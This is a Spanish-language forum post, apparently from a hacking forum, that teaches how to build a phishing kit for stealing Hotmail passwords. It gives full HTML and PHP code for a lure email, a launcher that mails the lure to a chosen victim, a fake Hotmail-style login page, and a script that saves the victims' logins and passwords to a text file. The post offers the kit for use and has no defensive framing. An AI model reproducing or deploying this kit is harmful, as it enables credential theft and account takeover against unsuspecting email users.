bueno la verdad q los xploit parecen la manera mas rapida y simple de conseguir contraseñas... Creo q a todos nos gustaria poder crear uno, pero la mayoria no sabemos como....
aca tengo un tutorial, me gustaria q lo vean ustedes q saben mas y me digan si es correcto :
Archivos que hay que crear :
1-Exploit.html (Este es un codigo en HTML de lo que ustedes quieran ... en todos los enlaces que tenga este formulario , cuando la victima le de click debe ser redirigido a otra pagina)
2-Lanzador.php : este envia los datos a la victima.
3-login_fack.php : Este los guarda en un archivo de texto , y para los que tienen más experiencia en una base de datos MySql.
4-formulario.htm : Este es el que nos salta en cualquier lanzador de exploit que nos pide que pongamos nuestro mail y el de la victima para lanzar el exploit y en caso de caer sea enviado a nuestro mail.
5-login_fack.php : Este es a donde sera redireccionada la victima despúes de recibir el exploit
6-falsear.php : Este es el archivo que procesa todos los datos despues que la victima los ingreso en "login_fack.php"
=================Exploit====================
<p><strong>Novedades de IPC-Soft </strong></p>
<table width="0" border="1" align="center" cellpadding="0" cellspacing="3">
<tr>
<td width="356">Nuevo Skin en la comunidad <a href="
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion">(Leer más...) </a></td>
<td width="360">Lanzadores v1.0 <a href="
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion">(Leer más...)</a> </td>
</tr>
<tr>
<td>MSN Messenger Fackerv2.0 <a href="
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion">(Leer más...)</a> </td>
<td>Cualquier cosa <a href="
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion">(Leer más...) </a></td>
</tr>
<tr>
<td>[by Hack-CBA]</td>
<td><a href="
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion">
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion</a></td>
</tr>
</table>
==================================================
Notarán que en cada (Leer más ...) nos lleva a una pagina llamada ::
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion ::
obiamente esta es la pagina donde se produce un pedido a la victima que coloque su login y pass de hotmail.
======================Lanzador.php================ ====
<?
$html="
AQUI el code de arriba (Exploit en HTML)
";
mail($victima,"Novedades IPC-Soft",$html);
echo "El exploit fué enviado con exito";
?>
================================================== ==
Explico un poco , aqui lo que hacemos es crear una variable "$html" donde indicamos el contenido, seria el mensaje .
mail(Aquien lo enviamos, asunto , cuerpo del mensaje);
echo "Mensaje que todo esta bien";
?> cerramos php
Ahora hay que crear el formulario del lanzador, es decir, el que comunmente dice
Victima | @hotmail.com|
Tu mail | @hotmail.com |
aqui no vamos a poner ningun "Tu mail" porque en lugar de eso , crearemos un archivo de texto que nos mostrará los users y passwordws introducidos.
============formulario.htm========
<form name="form1" method="post" action="lanzador.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Victima</td>
<td><input name="victima" type="text" id="victima" value=" @hotmail.com"></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p></p>
====================================
aqui simplemente notaran que die "victima" type...
al enviar el formulario a "lanzador.php" , este interpreta a "victima" como $victima y es el correo a quien sera enviado el e-mail con un mensaje HTML
ok, ya esta casi todo listo. Solo nos queda hacer el "login_fack.php" donde se guardaran los passwords retenidos.
Hay que crear un formulario ... estilo la pagina principal de
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesionwww.hotmail.com
para que sea más creible.(Eso queda a su criterio , no el mio).
=============login_fack.php===================
<form name="form1" method="post" action="falsear.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Login</td>
<td><input name="login" type="text" id="login"></td>
</tr>
<tr>
<td>Password</td>
<td><input name="pass" type="password" id="pass" value=""></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p> </p>
=============================================
Aqui vemos varias cosas interesantes: falsear.php , login , pass
bueno falsear.php es la pagina que nos va a procesar todo y guardar el password
login y pass , serian
$login
$pass
ahora que sabemos esto vamos a terminar el "lanzador"
.
Creamos otra pagina php================falsear.php====================
<?php
$archivo='pass_fack.txt';
$login=$_POST[login];
$pass=$_POST[pass];
$hcba=fopen($archivo,'a');
fwrite($hcba,$login.$pass);
echo "datos correctamente introducidos";
?>
========================
bueno , más simple imposible...
$archivo , tienen que colocar el nombre y extención del archivo de texto que va a guardar los datos
¿Qué datos guarda?
$login & $pass
Los escribe con el metodo $_post .
// $hcba=fopen($archivo,'a');
Aqui indicamos que $hcba es = a abrir el archivo en modo "a" que seria ir agregando contenido sin borrar otro.
y luego indicamos que escriba en $hcba el $login y el $pass. espero que les sirva---- 
saludos
Autor